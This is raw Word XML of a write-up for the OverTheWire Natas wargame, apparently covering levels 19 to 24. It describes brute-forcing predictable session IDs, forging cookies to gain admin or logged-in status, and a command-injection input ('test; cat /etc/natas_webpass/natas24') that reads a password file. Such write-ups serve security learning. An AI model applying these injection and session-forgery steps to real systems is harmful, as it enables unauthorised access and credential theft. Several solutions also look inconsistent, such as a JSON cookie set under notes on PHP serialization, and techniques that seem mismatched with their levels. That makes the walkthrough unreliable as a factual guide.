          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Log in with any credentials (e.g., user:pass).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC3EE2E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Check the PHPSESSID cookie (hex-encoded).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9524D0" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Decode it (e.g., "281-user").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2320E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Write a script to try all [ID]-admin combinations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D370B8B" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A82D4C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>When successful, the response contains the natas20 password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C29FC5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</w:p>
    <w:p w14:paraId="3C784553" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A82D4C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Tools Used: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A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Browser Dev Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Python Script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hex Decoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D08452F" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00BF526D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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lastRenderedPageBreak/>
        <w:t>Logic Behind Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The site uses hex-encoded session IDs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71531994" w14:textId="7DAE552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 xml:space="preserve">Level 19 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C092633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Steps :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260B2781" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A54B3D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54B3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Repeat steps like level 19 till 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F74374" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A54B3D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54B3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>When successful, the response contains the natas21 password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE36678" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A54B3D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54B3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Modify script to match the new session format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF05AC" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E98FE6" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A82D4C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Tools Used</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>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A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Python Script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03421A23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Logic Behind Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F1714E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A82D4C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82D4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Session IDs are still predictable but in a different format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9486D7" w14:textId="07C28493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 xml:space="preserve">Level 20 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 21 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0305DE38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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AC457" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Log in, intercept the request with Burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> suite</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABB07B6" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Change the cookie to:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>{"admin":1,"username":"admin"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423B440" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Refresh the page → Admin access granted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C6BAA5" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A54B3D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Tools Used:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PHP Serialization Knowledge (O:4:"User":2:{...}).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2F2AE" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A54B3D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If we edit the cookie to set admin=1, we get access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554D387" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0243C57A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 xml:space="preserve">Level 21 -Level 22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB8E37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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598BDD53" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Log in normally, check cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B6A7F8" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Edit the cookie to loggedin=1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B56C7BC" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Refresh → Logged in as admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B394DB1" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20664357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Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E321163" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00880EFE" w:rsidRDefault="0024263C" w:rsidP="00880EFE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Burp Suite </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1BFF5" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A54B3D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Logic:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If we manually set loggedin=1, we bypass login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BDEE4C" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6BC0B6" w14:textId="791648D4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Level 22</w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 23 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CCDD8E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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03712B81" w14:textId="77777777" w:rsidR="00856A66" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Open the page in curl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155C8FD1" w14:textId="6E9C763E" w:rsidR="0024263C" w:rsidRPr="00A54B3D" w:rsidRDefault="0024263C" w:rsidP="0024263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Pr="00A54B3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sh curl -v http://natas22.natas.labs.overthewire.org?revelio=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0608E3" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The response contains the password before redirecting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518FBCA3" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Tools Used:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244A0B2" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A54B3D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Logic 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A54B3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>by redirecting we can get password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD57A38" w14:textId="640635B2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 xml:space="preserve">Level 23 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BEA0F8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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79320FD9" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263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Write </w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Input:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>test; cat /etc/natas_webpass/natas24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096FC29" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The output shows the </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B545BFB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</w:p>
    <w:p w14:paraId="3E5970AB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Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08442AB7" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2752BF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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E3FEF" w14:textId="2FC9DFD3" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If we inject ; cat /etc/natas_webpass/natas2</w:t>
      </w:r>
      <w:r w:rsidR="00856A66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
